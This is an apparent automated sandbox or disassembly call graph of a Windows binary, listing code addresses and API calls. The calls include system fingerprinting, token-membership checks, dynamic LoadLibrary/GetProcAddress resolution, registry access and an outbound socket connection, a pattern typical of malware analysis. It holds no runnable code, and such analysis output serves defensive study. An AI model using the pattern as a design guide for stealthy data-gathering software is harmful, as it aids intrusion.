403bb4 2 API calls 17875->17876 17877 403ddf 17876->17877 17878 403bcc SysFreeString 17877->17878 17878->17874 17880 404150 SysAllocStringLen 17879->17880 17881 4078ef 17880->17881 17882 403c18 3 API calls 17881->17882 17883 407907 17882->17883 17884 40717c 8 API calls 17883->17884 17885 40791c 17884->17885 17886 403c18 3 API calls 17885->17886 17887 407926 17886->17887 17888 40717c 8 API calls 17887->17888 17889 40793b 17888->17889 17890 403c18 3 API calls 17889->17890 17891 407945 17890->17891 17892 40717c 8 API calls 17891->17892 17893 407957 17892->17893 17894 403c18 3 API calls 17893->17894 17895 407961 17894->17895 17896 403bf4 SysFreeString 17895->17896 17897 40797b 17896->17897 17897->17121 17899 416994 17898->17899 17899->17899 17900 406ce8 23 API calls 17899->17900 17901 4169b9 17900->17901 17902 403850 7 API calls 17901->17902 17903 4169cd 17902->17903 20612 416684 GetModuleFileNameA 17903->20612 17905 4169de 17906 403850 7 API calls 17905->17906 17907 4169f2 17906->17907 20614 407b08 17907->20614 17910 403850 7 API calls 17911 416a16 17910->17911 20636 4066e4 17911->20636 17914 406bd8 10 API calls 17915 416a3c 17914->17915 17916 403e78 3 API calls 17915->17916 17917 416a51 17916->17917 17918 4037dc 7 API calls 17917->17918 17919 416a6a 17918->17919 17920 406634 5 API calls 17919->17920 17921 416a80 17920->17921 17922 4065f0 6 API calls 17921->17922 17923 416a90 17922->17923 17924 403e78 3 API calls 17923->17924 17925 416aaa 17924->17925 17926 4037dc 7 API calls 17925->17926 17927 416ac3 17926->17927 17928 416ace GetSystemMetrics 17927->17928 17929 40709c 4 API calls 17928->17929 17930 416ae0 GetSystemMetrics 17929->17930 17931 40709c 4 API calls 17930->17931 17932 416af7 17931->17932 17933 403e78 3 API calls 17932->17933 17934 416b0c 17933->17934 20643 4166b4 17934->20643 17937 403850 7 API calls 17938 416b39 17937->17938 20650 416894 17938->20650 17989 403bfa 17988->17989 17990 403c00 SysFreeString 17989->17990 17991 403c12 17989->17991 17990->17989 17991->17013 17994 40350e 17992->17994 17993 403534 17996 403bdc 17993->17996 17994->17993 17995 402550 7 API calls 17994->17995 17995->17994 17997 403bf0 17996->17997 17998 403be2 SysFreeString 17996->17998 17997->17029 17998->17997 18000 404289 17999->18000 18019 4042be 17999->18019 18001 4042c3 18000->18001 18002 40429e 18000->18002 18005 4042d4 18001->18005 18006 4042ca 18001->18006 18003 4042e0 18002->18003 18004 4042a2 18002->18004 18007 4042e7 18003->18007 18008 4042ee 18003->18008 18009 4042a6 18004->18009 18017 4042f7 18004->18017 18011 403508 7 API calls 18005->18011 18010 4034e4 7 API calls 18006->18010 18012 403bdc SysFreeString 18007->18012 18013 403bf4 SysFreeString 18008->18013 18014 4042aa 18009->18014 18018 404306 18009->18018 18010->18019 18011->18019 18012->18019 18013->18019 18016 404324 18014->18016 18023 4042ae 18014->18023 18016->18019 20854 404234 18016->20854 18017->18019 20849 404268 18017->20849 18018->18019 18020 404280 9 API calls 18018->18020 18019->17139 18020->18018 18022 404810 9 API calls 18022->18023 18023->18019 18023->18022 18025 402555 18024->18025 18026 402568 18024->18026 18025->18026 18028 402614 18025->18028 18026->17256 18029 4025cc 18028->18029 18032 4025c0 18029->18032 18035 4034cc 18032->18035 18036 4033f4 7 API calls 18035->18036 18037 4025cb 18036->18037 18037->18026 18039 40353c 18038->18039 18042 40354c 18038->18042 18039->18042 18053 4035a8 18039->18053 18040 40357a 18044 407c34 18040->18044 18042->18040 18043 402550 7 API calls 18042->18043 18043->18040 18046 407c73 FreeSid 18044->18046 18046->17268 18048 407d5a 18047->18048 18049 407d60 LookupAccountSidA CheckTokenMembership 18048->18049 18050 407dd9 18048->18050 18051 407dae FreeSid 18049->18051 18050->17280 18051->17280 18054 4035d0 18053->18054 18055 4035ac 18053->18055 18054->18042 18058 402530 18055->18058 18059 402535 18058->18059 18060 402548 18058->18060 18059->18060 18061 402614 7 API calls 18059->18061 18060->18042 18061->18060 18063 403bdc SysFreeString 18062->18063 18064 406f3f 18063->18064 18102 406e6c 18064->18102 18130 403c18 18067->18130 18069 406bf5 RegCreateKeyExW 18070 406c20 RegQueryValueExW 18069->18070 18071 406c62 18069->18071 18072 406c55 RegCloseKey 18070->18072 18073 406c45 18070->18073 18071->17294 18072->18071 18074 403d6c 4 API calls 18073->18074 18074->18072 18076 406613 18075->18076 18077 406625 18075->18077 18078 403d6c 4 API calls 18076->18078 18079 406623 18077->18079 18080 403bdc SysFreeString 18077->18080 18078->18079 18079->17300 18080->18079 18082 406653 18081->18082 18083 406657 18082->18083 18084 406669 18082->18084 18086 403d6c 4 API calls 18083->18086 18085 403bdc SysFreeString 18084->18085 18087 406667 18085->18087 18086->18087 18087->17302 18089 40628e 18088->18089 18140 406204 18089->18140 18093 4062b0 18094 4062cc 18093->18094 18095 4037dc 7 API calls 18093->18095 18096 4034e4 7 API calls 18094->18096 18095->18093 18097 4062e1 18096->18097 18097->17305 18099 403a7c 18098->18099 18101 403aa7 18098->18101 18153 403b1c 18099->18153 18101->17318 18103 406e86 18102->18103 18104 404150 SysAllocStringLen 18102->18104 18114 404150 18103->18114 18104->18103 18106 406e8e 18107 406ebf RegOpenKeyExW 18106->18107 18118 403d98 18107->18118 18111 406f04 18112 403bf4 SysFreeString 18111->18112 18113 406f1e 18112->18113 18113->17290 18115 404156 SysAllocStringLen 18114->18115 18116 40416c 18114->18116 18115->18116 18117 403bac 18115->18117 18116->18106 18117->18114 18119 403d9c RegQueryValueExW 18118->18119 18120 403d6c 18119->18120 18121 403cd0 18120->18121 18122 403cd8 SysAllocStringLen 18121->18122 18123 403bdc 18121->18123 18124 403ce8 SysFreeString 18122->18124 18125 403bac 18122->18125 18126 403bf0 18123->18126 18127 403be2 SysFreeString 18123->18127 18124->18111 18128 404156 SysAllocStringLen 18125->18128 18129 40416c 18125->18129 18126->18111 18127->18126 18128->18125 18128->18129 18129->18111 18131 403c20 18130->18131 18132 403bdc 18130->18132 18131->18132 18133 403c2b SysReAllocStringLen 18131->18133 18134 403bf0 18132->18134 18135 403be2 SysFreeString 18132->18135 18136 403c3b 18133->18136 18137 403bac 18133->18137 18134->18069 18135->18134 18136->18069 18138 404156 SysAllocStringLen 18137->18138 18139 40416c 18137->18139 18138->18137 18138->18139 18139->18069 18141 406215 18140->18141 18142 4034e4 7 API calls 18141->18142 18143 40626d 18142->18143 18144 40680c 18143->18144 18145 406811 18144->18145 18148 4035d4 18145->18148 18149 4035a8 7 API calls 18148->18149 18150 4035e4 18149->18150 18151 4034e4 7 API calls 18150->18151 18152 4035fc 18151->18152 18152->18093 18154 403b29 18153->18154 18158 403b59 18153->18158 18156 403b35 18154->18156 18157 4035a8 7 API calls 18154->18157 18155 4034e4 7 API calls 18155->18156 18156->18101 18157->18158 18158->18155 18160 40399c 18159->18160 18161 4039d7 18160->18161 18162 4035a8 7 API calls 18160->18162 18161->17336 18163 4039b3 18162->18163 18163->18161 18164 402550 7 API calls 18163->18164 18164->18161 18166 4035d4 7 API calls 18165->18166 18167 4036d9 18166->18167 18167->17361 18169 403a22 18168->18169 18170 4039f5 18168->18170 18171 4034e4 7 API calls 18169->18171 18170->18169 18172 403a09 18170->18172 18174 403a18 18171->18174 18173 4035d4 7 API calls 18172->18173 18173->18174 18174->17424 18176 417868 18175->18176 18177 40357c 7 API calls 18176->18177 18178 4178a3 18177->18178 18179 4039e8 7 API calls 18178->18179 18180 4178ab GetModuleHandleA 18179->18180 18181 4178c7 18180->18181 18182 4178b7 18180->18182 18184 4039e8 7 API calls 18181->18184 18183 4039e8 7 API calls 18182->18183 18185 4178bf LoadLibraryA 18183->18185 18186 4178cf GetProcAddress 18184->18186 18185->18181 18187 4039e8 7 API calls 18186->18187 18188 4178e6 GetProcAddress 18187->18188 18189 4039e8 7 API calls 18188->18189 18190 4178fd GetProcAddress 18189->18190 18191 4039e8 7 API calls 18190->18191 18192 417914 GetProcAddress 18191->18192 18193 4039e8 7 API calls 18192->18193 18194 41792b GetProcAddress 18193->18194 18195 4039e8 7 API calls 18194->18195 18196 417942 GetProcAddress 18195->18196 18197 4039e8 7 API calls 18196->18197 18198 417959 GetProcAddress 18197->18198 18199 4039e8 7 API calls 18198->18199 18200 417970 GetProcAddress 18199->18200 18201 417bde 18200->18201 18209 417987 18200->18209 18202 403bf4 SysFreeString 18201->18202 18203 417bfb 18202->18203 18204 4034e4 7 API calls 18203->18204 18205 417c06 18204->18205 18206 403bf4 SysFreeString 18205->18206 18207 417c16 18206->18207 18208 403508 7 API calls 18207->18208 18211 417c23 18208->18211 18209->18201 18210 4034e4 7 API calls 18209->18210 18212 4179f7 18210->18212 18213 403508 7 API calls 18211->18213 18215 417a07 WSAStartup 18212->18215 18214 417c30 18213->18214 18214->17432 18215->18201 18216 417a16 socket 18215->18216 18216->18201 18217 417a2d 18216->18217 18218 417a3e gethostbyname 18217->18218 18218->18201 18219 417a4d htons connect 18218->18219 18219->18201 18220 417a84 18219->18220 18221 403850 7 API calls 18220->18221 18222 417aca 18221->18222 18260 41745c 18222->18260 18224 417af4 18266 403e78 18224->18266 18240 417687 18239->18240 18241 4034e4 7 API calls 18240->18241 18242 41769d 18241->18242 18281 404804 18242->18281 18244 4176b8 18245 417784 18244->18245 18284 41757c 18244->18284 18246 417788 18245->18246 18247 4177ad 18245->18247 18249 4037dc 7 API calls 18246->18249 18294 4174c8 18247->18294 18252 41779c 18249->18252 18251 4177ab 18254 4034e4 7 API calls 18251->18254 18253 417d84 51 API calls 18252->18253 18253->18251 18255 4177cc 18254->18255 18307 404810 18255->18307 18258 4034e4 7 API calls 18259 4177e2 18258->18259 18259->17431 18261 41748b 18260->18261 18262 403c18 3 API calls 18261->18262 18263 4174a3 18262->18263 18264 403bdc SysFreeString 18263->18264 18265 4174b8 18264->18265 18265->18224 18267 403e80 18266->18267 18272 403bb4 18267->18272 18269 403e95 18278 403bcc 18269->18278 18273 403bc8 18272->18273 18274 403bb8 SysAllocStringLen 18272->18274 18273->18269 18274->18273 18275 403bac 18274->18275 18276 404156 SysAllocStringLen 18275->18276 18277 40416c 18275->18277 18276->18275 18276->18277 18277->18269 18279 403bd2 SysFreeString 18278->18279 18280 403bd8 18278->18280 18279->18280 18313 404678 18281->18313 18285 417593 LoadLibraryA GetProcAddress 18284->18285 18370 403980 18284->18370 18287 4175be 18285->18287 18293 4175d9 18285->18293 18288 402530 7 API calls 18287->18288 18289 4175cd 18288->18289 18291 402530 7 API calls 18289->18291 18290 4034e4 7 API calls 18292 41761d 18290->18292 18291->18293 18292->18244 18293->18290 18295 41745c 4 API calls 18294->18295 18296 4174f4 18295->18296 18297 41745c 4 API calls 18296->18297 18298 417509 18297->18298 18299 41745c 4 API calls 18298->18299 18300 41751e 18299->18300 18301 41745c 4 API calls 18300->18301 18302 417533 18301->18302 18303 403e78 3 API calls 18302->18303 18304 417543 18303->18304 18305 403bf4 SysFreeString 18304->18305 18306 417567 18305->18306 18306->18251 18308 404848 18307->18308 18310 404816 18307->18310 18308->18258 18309 404840 18311 402550 7 API calls 18309->18311 18310->18308 18310->18309 18312 404280 9 API calls 18310->18312 18311->18308 18312->18309 18314 4046b1 18313->18314 18315 404697 18313->18315 18320 4046fb 18314->18320 18321 402614 7 API calls 18314->18321 18316 4046a2 18315->18316 18317 402614 7 API calls 18315->18317 18327 404670 18316->18327 18317->18316 18319 4046ac 18319->18244 18322 402530 7 API calls 18320->18322 18324 404708 18320->18324 18321->18320 18323 404747 18322->18323 18323->18324 18330 404658 18323->18330 18324->18319 18326 404678 12 API calls 18324->18326 18326->18324 18328 404810 9 API calls 18327->18328 18329 404675 18328->18329 18329->18319 18333 4044a0 18330->18333 18332 404663 18332->18324 18334 4044b5 18333->18334 18335 4044db 18333->18335 18337 4044ba 18334->18337 18338 4044fd 18334->18338 18336 403538 7 API calls 18335->18336 18347 4044f8 18335->18347 18336->18335 18340 404511 18337->18340 18341 4044bf 18337->18341 18339 403c18 3 API calls 18338->18339 18338->18347 18339->18338 18340->18347 18352 40436c 18340->18352 18343 4044c4 18341->18343 18344 404525 18341->18344 18345 404546 18343->18345 18346 4044c9 18343->18346 18344->18347 18348 4044a0 12 API calls 18344->18348 18345->18347 18357 404384 18345->18357 18346->18335 18346->18347 18350 404577 18346->18350 18347->18332 18348->18344 18350->18347 18366 40484c 18350->18366 18353 40437c 18352->18353 18355 404375 18352->18355 18354 402614 7 API calls 18353->18354 18356 404383 18354->18356 18355->18340 18356->18340 18364 40439e 18357->18364 18358 403538 7 API calls 18358->18364 18359 403c18 3 API calls 18359->18364 18360 40436c 7 API calls 18360->18364 18361 40448a 18361->18345 18362 4044a0 12 API calls 18362->18364 18363 404384 12 API calls 18363->18364 18364->18358 18364->18359 18364->18360 18364->18361 18364->18362 18364->18363 18365 40484c 9 API calls 18364->18365 18365->18364 18368 404853 18366->18368 18367 40486d 18367->18350 18368->18367 18369 404810 9 API calls 18368->18369 18369->18367 18371 403984 18370->18371 18371->18285 18409 40410c 18372->18409 18374 40630e 18375 40410c 3 API calls 18374->18375 18376 406339 18375->18376 18376->17611 18378 404150 SysAllocStringLen 18377->18378 18379 4094fc 18378->18379 18380 407a18 12 API calls 18379->18380 18390 409522 18380->18390 18381 4095e3 18382 403bf4 SysFreeString 18381->18382 18383 4095fd 18382->18383 18384 403508 7 API calls 18383->18384 18385 40960a 18384->18385 18386 404810 9 API calls 18385->18386 18387 409618 18386->18387 18388 4034e4 7 API calls 18387->18388 18389 409620 18388->18389 18391 403bdc SysFreeString 18389->18391 18390->18381 18393 4039f0 7 API calls 18390->18393 18394 403e78 3 API calls 18390->18394 18415 407360 18390->18415 18392 409628 18391->18392 18396 403e14 18392->18396 18393->18390 18394->18390 18397 403e2b 18396->18397 18398 403e71 18397->18398 18399 403bb4 2 API calls 18397->18399 18402 40776c 18398->18402 18400 403e48 18399->18400 18401 403bcc SysFreeString 18400->18401 18401->18398 18403 404150 SysAllocStringLen 18402->18403 18404 40777c 18403->18404 18405 403bdc SysFreeString 18404->18405 18406 4077b7 18405->18406 18406->17620 18406->17626 18408 403994 GetProcAddress 18407->18408 18408->17638 18410 404119 18409->18410 18414 404120 18409->18414 18412 403bb4 2 API calls 18410->18412 18411 403bcc SysFreeString 18413 404149 18411->18413 18412->18414 18413->18374 18414->18411 18416 404150 SysAllocStringLen 18415->18416 18417 407375 18416->18417 18418 4039e8 7 API calls 18417->18418 18419 4073c5 WriteFile 18418->18419 18420 4073d6 18419->18420 18421 4034e4 7 API calls 18420->18421 18422 4073eb 18421->18422 18423 403bdc SysFreeString 18422->18423 18424 4073f3 18423->18424 18424->18390 18426 40a39c 18425->18426 18426->18426 18427 40a51b 18426->18427 18428 4062fc 3 API calls 18426->18428 18430 4034e4 7 API calls 18427->18430 18429 40a3d7 18428->18429 18734 409ef0 18429->18734 18431 40a530 18430->18431 18432 403bdc SysFreeString 18431->18432 18433 40a538 18432->18433 18435 403508 7 API calls 18433->18435 18437 40a545 18435->18437 18440 403bdc SysFreeString 18437->18440 18438 4062fc 3 API calls 18439 40a411 18438->18439 18443 409ef0 20 API calls 18439->18443 18441 40a54d 18440->18441 18442 403508 7 API calls 18441->18442 18444 40a55a 18442->18444 18445 40a433 18443->18445 18446 403bdc SysFreeString 18444->18446 18447 4062fc 3 API calls 18445->18447 18448 40a562 18446->18448 18449 40a44b 18447->18449 18450 403508 7 API calls 18448->18450 18453 409ef0 20 API calls 18449->18453 18451 40a56f 18450->18451 18452 403bdc SysFreeString 18451->18452 18454 40a577 18452->18454 18455 40a46d 18453->18455 18456 403508 7 API calls 18454->18456 18457 4062fc 3 API calls 18455->18457 18458 40a584 18456->18458 18460 40a485 18457->18460 18459 403bdc SysFreeString 18458->18459 18461 40a58c 18459->18461 18464 409ef0 20 API calls 18460->18464 18462 403508 7 API calls 18461->18462 18463 40a599 18462->18463 18466 403bdc SysFreeString 18463->18466 18465 40a4a7 18464->18465 18467 4062fc 3 API calls 18465->18467 18468 40a5a1 18466->18468 18469 40a4bf 18467->18469 18470 4034e4 7 API calls 18468->18470 18472 409ef0 20 API calls 18469->18472 18471 40a5a9 18470->18471 18477 40ac08 18471->18477 18473 40a4e1 18472->18473 18474 4062fc 3 API calls 18473->18474 18475 40a4f9 18474->18475 18476 409ef0 20 API calls 18475->18476 18476->18427 18478 40ac10 18477->18478 18478->18478 18479 40b103 18478->18479 18480 4062fc 3 API calls 18478->18480 18482 403bf4 SysFreeString 18479->18482 18481 40ac42 18480->18481 18842 40a9e4 18481->18842 18484 40b120 18482->18484 18609 40c104 18484->18609 18486 4062fc 3 API calls 18487 40ac64 18486->18487 18488 40a9e4 24 API calls 18487->18488 18489 40ac77 18488->18489 18490 4062fc 3 API calls 18489->18490 18491 40ac86 18490->18491 18492 40a9e4 24 API calls 18491->18492 18493 40ac99 18492->18493 18494 4062fc 3 API calls 18493->18494 18495 40aca8 18494->18495 18496 40a9e4 24 API calls 18495->18496 18497 40acbb 18496->18497 18498 4062fc 3 API calls 18497->18498 18499 40acca 18498->18499 18500 40a9e4 24 API calls 18499->18500 18501 40acdd 18500->18501 18502 4062fc 3 API calls 18501->18502 18503 40acec 18502->18503 18504 40a9e4 24 API calls 18503->18504 18505 40acff 18504->18505 18506 4062fc 3 API calls 18505->18506 18507 40ad0e 18506->18507 18508 40a9e4 24 API calls 18507->18508 18509 40ad21 18508->18509 18510 4062fc 3 API calls 18509->18510 18511 40ad30 18510->18511 18610 40c11d 18609->18610 18950 40bebc 18609->18950 18612 40bc24 18610->18612 18613 40357c 7 API calls 18612->18613 18614 40bc5b 18613->18614 18972 40bb90 18614->18972 18616 40bdd3 18617 403508 7 API calls 18616->18617 18618 40be01 18617->18618 18623 40c980 18618->18623 18619 403a30 7 API calls 18621 40bc66 18619->18621 18620 4039f0 7 API calls 18620->18621 18621->18616 18621->18619 18621->18620 18622 40525c 12 API calls 18621->18622 18622->18621 19124 40c208 18623->19124 18735 409ef9 18734->18735 18735->18735 18736 404150 SysAllocStringLen 18735->18736 18737 409f15 18736->18737 18738 404804 12 API calls 18737->18738 18739 409f48 18738->18739 18740 403e14 3 API calls 18739->18740 18765 409f69 18740->18765 18741 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18741->18765 18742 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 18742->18765 18744 40a290 18745 403508 7 API calls 18744->18745 18746 40a31f 18745->18746 18747 403bf4 SysFreeString 18746->18747 18748 40a32f 18747->18748 18749 4034e4 7 API calls 18748->18749 18750 40a337 18749->18750 18751 404810 9 API calls 18750->18751 18752 40a345 18751->18752 18753 403508 7 API calls 18752->18753 18754 40a352 18753->18754 18755 4034e4 7 API calls 18754->18755 18756 40a35a 18755->18756 18757 403bdc SysFreeString 18756->18757 18758 40a362 18757->18758 18759 4034e4 7 API calls 18758->18759 18760 40a36a 18759->18760 18760->18438 18761 4069a8 7 API calls 18761->18765 18762 4039e8 7 API calls 18762->18765 18763 4034e4 7 API calls 18763->18765 18764 4036cc 7 API calls 18764->18765 18765->18741 18765->18742 18765->18744 18765->18761 18765->18762 18765->18763 18765->18764 18766 403798 7 API calls 18765->18766 18768 409c28 18765->18768 18794 40525c 18765->18794 18766->18765 18769 409c30 18768->18769 18769->18769 18770 404150 SysAllocStringLen 18769->18770 18771 409c47 18770->18771 18772 404804 12 API calls 18771->18772 18773 409c75 18772->18773 18816 407228 18773->18816 18775 409c83 18776 409ca5 18775->18776 18777 403850 7 API calls 18775->18777 18778 4074e8 7 API calls 18776->18778 18777->18776 18779 409cb5 18778->18779 18780 40357c 7 API calls 18779->18780 18792 409cc0 18780->18792 18781 403850 7 API calls 18781->18792 18782 409e65 18783 403508 7 API calls 18782->18783 18784 409e7f 18783->18784 18785 403bdc SysFreeString 18784->18785 18786 409e87 18785->18786 18786->18765 18787 4074e8 7 API calls 18787->18792 18788 4039f0 7 API calls 18788->18792 18789 4037dc 7 API calls 18789->18792 18791 403538 7 API calls 18791->18792 18792->18781 18792->18782 18792->18787 18792->18788 18792->18789 18792->18791 18793 404804 12 API calls 18792->18793 18831 403a30 18792->18831 18793->18792 18795 405276 18794->18795 18796 404804 12 API calls 18795->18796 18804 4053eb 18795->18804 18797 40534a 18796->18797 18798 403538 7 API calls 18797->18798 18799 405365 18798->18799 18800 403538 7 API calls 18799->18800 18801 40537d 18800->18801 18802 403538 7 API calls 18801->18802 18803 405395 18802->18803 18805 403538 7 API calls 18803->18805 18807 403508 7 API calls 18804->18807 18806 4053ad 18805->18806 18810 403538 7 API calls 18806->18810 18808 405405 18807->18808 18809 403508 7 API calls 18808->18809 18811 405412 18809->18811 18812 4053c5 18810->18812 18811->18765 18813 403538 7 API calls 18812->18813 18814 4053dd 18813->18814 18815 405114 7 API calls 18814->18815 18815->18804 18817 404150 SysAllocStringLen 18816->18817 18818 407242 18817->18818 18819 4034e4 7 API calls 18818->18819 18820 407258 18819->18820 18821 4034e4 7 API calls 18820->18821 18823 407260 18821->18823 18822 4072c0 18824 403b1c 7 API calls 18822->18824 18823->18822 18825 407335 18823->18825 18829 4072df 18824->18829 18826 4034e4 7 API calls 18825->18826 18827 40734a 18826->18827 18828 403bdc SysFreeString 18827->18828 18830 407352 18828->18830 18829->18775 18830->18775 18836 4039e0 18831->18836 18833 403a74 18833->18792 18834 403a3e 18834->18833 18835 403b1c 7 API calls 18834->18835 18835->18833 18837 40399c 18836->18837 18838 4035a8 7 API calls 18837->18838 18839 4039d7 18837->18839 18840 4039b3 18838->18840 18839->18834 18840->18839 18841 402550 7 API calls 18840->18841 18841->18839 18843 40aa2d 18842->18843 18844 404150 SysAllocStringLen 18842->18844 18845 404150 SysAllocStringLen 18843->18845 18844->18843 18846 40aa35 18845->18846 18847 403bdc SysFreeString 18846->18847 18848 40aa4b 18847->18848 18849 403e14 3 API calls 18848->18849 18851 40aa65 18849->18851 18850 40776c 2 API calls 18850->18851 18851->18850 18852 40ab9e 18851->18852 18853 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18851->18853 18854 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 18851->18854 18860 40a6f0 18851->18860 18855 403bf4 SysFreeString 18852->18855 18853->18851 18854->18851 18857 40abc8 18855->18857 18858 403bf4 SysFreeString 18857->18858 18859 40abd5 18858->18859 18859->18486 18861 40a6f9 18860->18861 18861->18861 18862 404150 SysAllocStringLen 18861->18862 18863 40a716 18862->18863 18864 404150 SysAllocStringLen 18863->18864 18865 40a71e 18864->18865 18866 404150 SysAllocStringLen 18865->18866 18867 40a726 18866->18867 18868 4034e4 7 API calls 18867->18868 18869 40a73c 18868->18869 18870 40709c 4 API calls 18869->18870 18871 40a74d 18870->18871 18905 406fdc 18871->18905 18874 403e78 3 API calls 18875 40a76d 18874->18875 18876 4078d8 8 API calls 18875->18876 18933 4027b4 QueryPerformanceCounter 18905->18933 18907 407000 18908 40709c 4 API calls 18907->18908 18909 40703b 18908->18909 18910 40709c 4 API calls 18909->18910 18911 407048 18910->18911 18912 40709c 4 API calls 18911->18912 18913 407055 18912->18913 18914 40709c 4 API calls 18913->18914 18915 407063 18914->18915 18916 403e78 3 API calls 18915->18916 18917 407073 18916->18917 18918 403bf4 SysFreeString 18917->18918 18919 40708d 18918->18919 18919->18874 18934 4027c1 18933->18934 18935 4027cc GetTickCount 18933->18935 18934->18907 18935->18907 18951 40bef6 18950->18951 18952 40bf03 LoadLibraryA GetProcAddress 18951->18952 18953 40bf25 18952->18953 18954 40bf5b LoadLibraryA 18953->18954 18955 40c0a3 18954->18955 18956 40bf6b 18954->18956 18958 403bf4 SysFreeString 18955->18958 18957 40bf77 GetProcAddress 18956->18957 18959 403990 18957->18959 18960 40c0bd 18958->18960 18961 40bf8c GetProcAddress 18959->18961 18962 403508 7 API calls 18960->18962 18963 403990 18961->18963 18964 40c0ca 18962->18964 18965 40bfa1 GetProcAddress 18963->18965 18966 404280 9 API calls 18964->18966 18970 40bfbc 18965->18970 18967 40c0dd 18966->18967 18967->18610 18968 404810 9 API calls 18968->18970 18969 40370c 8 API calls 18969->18970 18970->18955 18970->18968 18970->18969 18971 40525c 12 API calls 18970->18971 18971->18970 18973 40bba2 18972->18973 18974 4034e4 7 API calls 18973->18974 18975 40bbb7 18974->18975 18982 40baf0 18975->18982 18978 40bbca 18980 4034e4 7 API calls 18978->18980 18981 40bbdf 18980->18981 18981->18621 19001 4075c0 18982->19001 18984 40bb25 18985 403bdc SysFreeString 18984->18985 18986 40bb64 18985->18986 18987 4034e4 7 API calls 18986->18987 18988 40bb6c 18987->18988 18988->18978 18989 40ba38 18988->18989 18990 40ba51 18989->18990 18991 4034e4 7 API calls 18990->18991 18992 40ba66 18991->18992 19010 40b25c OleInitialize 18992->19010 19002 404150 SysAllocStringLen 19001->19002 19003 4075da 19002->19003 19004 404150 SysAllocStringLen 19003->19004 19005 4075e2 19004->19005 19006 403d6c 4 API calls 19005->19006 19007 40767e 19006->19007 19008 403bf4 SysFreeString 19007->19008 19009 4076a2 19008->19009 19009->18984 19011 404804 12 API calls 19010->19011 19012 40b29d 19011->19012 19047 40b224 19012->19047 19014 40b383 19018 4034e4 7 API calls 19014->19018 19015 40b2ad 19015->19014 19016 404804 12 API calls 19015->19016 19020 4039f0 7 API calls 19015->19020 19021 402530 7 API calls 19015->19021 19051 40370c 19015->19051 19067 404594 19015->19067 19016->19015 19019 40b3a0 19018->19019 19020->19015 19021->19015 19071 40495c 19047->19071 19050 40b246 19050->19015 19052 403640 19051->19052 19056 403662 19052->19056 19068 4045a4 19067->19068 19072 404962 76CCE550 19071->19072 19072->19050 19125 40c210 19124->19125 19125->19125 19126 404150 SysAllocStringLen 19125->19126 19127 40c225 19126->19127 19128 40357c 7 API calls 19127->19128 19129 40c25c 19128->19129 19130 40357c 7 API calls 19129->19130 19343 41030c 19342->19343 19344 4062fc 3 API calls 19343->19344 19345 41033e 19344->19345 19678 41006c 19345->19678 19348 4062fc 3 API calls 19349 41036d 19348->19349 19350 41006c 21 API calls 19349->19350 19351 41038d 19350->19351 19352 4062fc 3 API calls 19351->19352 19353 41039c 19352->19353 19354 41006c 21 API calls 19353->19354 19355 4103bc 19354->19355 19356 4062fc 3 API calls 19355->19356 19357 4103cb 19356->19357 19358 41006c 21 API calls 19357->19358 19359 4103eb 19358->19359 19360 4062fc 3 API calls 19359->19360 19361 4103fa 19360->19361 19362 41006c 21 API calls 19361->19362 19363 41041a 19362->19363 19364 4062fc 3 API calls 19363->19364 19365 410429 19364->19365 19366 41006c 21 API calls 19365->19366 19367 410449 19366->19367 19368 4062fc 3 API calls 19367->19368 19369 410458 19368->19369 19370 41006c 21 API calls 19369->19370 19371 410478 19370->19371 19372 410d19 19371->19372 19373 4062fc 3 API calls 19371->19373 19374 403bf4 SysFreeString 19372->19374 19375 410497 19373->19375 19376 410d36 19374->19376 19722 40f7a8 19375->19722 19377 4034e4 7 API calls 19376->19377 19378 410d3e 19377->19378 19524 411c54 19378->19524 19525 411c5c 19524->19525 19526 4124cc 19525->19526 19527 4062fc 3 API calls 19525->19527 19529 403bf4 SysFreeString 19526->19529 19528 411c9e 19527->19528 20015 41160c 19528->20015 19530 4124e9 19529->19530 19531 4034e4 7 API calls 19530->19531 19532 4124f1 19531->19532 19532->17121 19679 410075 19678->19679 19679->19679 19680 404150 SysAllocStringLen 19679->19680 19681 410094 19680->19681 19682 404150 SysAllocStringLen 19681->19682 19683 41009c 19682->19683 19684 404150 SysAllocStringLen 19683->19684 19685 4100a4 19684->19685 19686 403e14 3 API calls 19685->19686 19690 4100d2 19686->19690 19687 403d6c 4 API calls 19687->19690 19688 403e78 3 API calls 19688->19690 19690->19687 19690->19688 19691 403798 7 API calls 19690->19691 19692 410143 19690->19692 19786 40fe00 19690->19786 19691->19690 19693 403e78 3 API calls 19692->19693 19695 41016b 19693->19695 19694 403d6c 4 API calls 19694->19695 19695->19694 19696 403e78 3 API calls 19695->19696 19697 40fe00 13 API calls 19695->19697 19698 403798 7 API calls 19695->19698 19699 4101dc 19695->19699 19696->19695 19697->19695 19698->19695 19700 410230 19699->19700 19701 403e78 3 API calls 19699->19701 19703 403bdc SysFreeString 19700->19703 19702 410211 19701->19702 19811 40e6d4 19702->19811 19704 410248 19703->19704 19705 4034e4 7 API calls 19704->19705 19707 410253 19705->19707 19708 403bf4 SysFreeString 19707->19708 19709 410263 19708->19709 19710 4034e4 7 API calls 19709->19710 19711 41026e 19710->19711 19712 403bf4 SysFreeString 19711->19712 19713 41027e 19712->19713 19714 4034e4 7 API calls 19713->19714 19715 410289 19714->19715 19716 403bdc SysFreeString 19715->19716 19717 410294 19716->19717 19718 4034e4 7 API calls 19717->19718 19719 41029c 19718->19719 19720 403bf4 SysFreeString 19719->19720 19721 4102a9 19720->19721 19721->19348 19723 40f7b1 19722->19723 19723->19723 19724 404150 SysAllocStringLen 19723->19724 19725 40f7d0 19724->19725 19726 404150 SysAllocStringLen 19725->19726 19727 40f7d8 19726->19727 19728 404150 SysAllocStringLen 19727->19728 19729 40f7e0 19728->19729 19730 403e14 3 API calls 19729->19730 19743 40f808 19730->19743 19787 40fe08 19786->19787 19787->19787 19788 404150 SysAllocStringLen 19787->19788 19789 40fe20 19788->19789 19790 4034e4 7 API calls 19789->19790 19791 40fe36 19790->19791 19792 407228 9 API calls 19791->19792 19793 40fe41 19792->19793 19794 407a18 12 API calls 19793->19794 19795 40fe51 19794->19795 19796 40ffbd 19795->19796 19801 40357c 7 API calls 19795->19801 19808 4039f0 7 API calls 19795->19808 19809 403850 7 API calls 19795->19809 19819 405194 19795->19819 19797 403538 7 API calls 19796->19797 19798 40ffc8 19797->19798 19799 404810 9 API calls 19798->19799 19800 40ffd6 19799->19800 19802 403508 7 API calls 19800->19802 19801->19795 19803 